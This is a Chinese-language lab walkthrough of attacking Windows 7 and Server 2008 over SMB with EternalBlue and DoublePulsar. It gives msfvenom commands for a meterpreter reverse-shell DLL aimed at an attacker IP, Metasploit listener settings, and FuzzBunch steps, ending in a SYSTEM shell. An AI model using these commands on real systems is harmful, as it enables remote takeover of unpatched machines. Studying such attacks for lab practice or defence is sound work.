1. 程式人生 > >E+D:eternalblue+Doublepulsar

E+D:eternalblue+Doublepulsar

靶機:192.168.6.39(windows server 2008 與windows 7測試過,沒有問題)

攻擊機:192.168.6.42

參考連結

利用說明:

本次實驗首先執行指令碼攻擊,對目標IP、埠、系統版本等進行設定,接下來生成惡意的dll檔案,並使用指令碼載入它,最終達到實驗目的。

主要是針對windows主機的SMB、RDP協議進行攻擊,因為我主要根據他們提供的payload的程式,利用這兩個模組eternalblue和Doublepulsar可以對攻擊smb和rdp協議

在pentestbox下執行

1、實現互動埠

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42

監聽本地埠並且生成一個.dll的檔案。本地主機的IP地址是192.168.6.42,監聽的埠是6666。

 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42 lport=6666 -f dll -o E:\1\111.dll

2、設定本地監聽的埠

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.6.42

set lport 6666

run

在cmd中,即python的根目錄下實現:

shadowbroker是方程式工具

E:\Install\work\python_2.6.6>python E:\1\shadowbroker\shadowbroker\windows\fb.py

先進行測試

use Eternalblue

fb Special (Eternalblue) > use Doublepulsar

填上payload的地址

一直回車直到出現執行成功為止;

來到監聽的埠,是上面的2的過程,檢視,進入meterpreter下面,執行shell。進入遠端伺服器,這裡是2008系統。

whoami檢視,獲得了system許可權。

windows sever 2003測試失敗

工具的利用方式--成功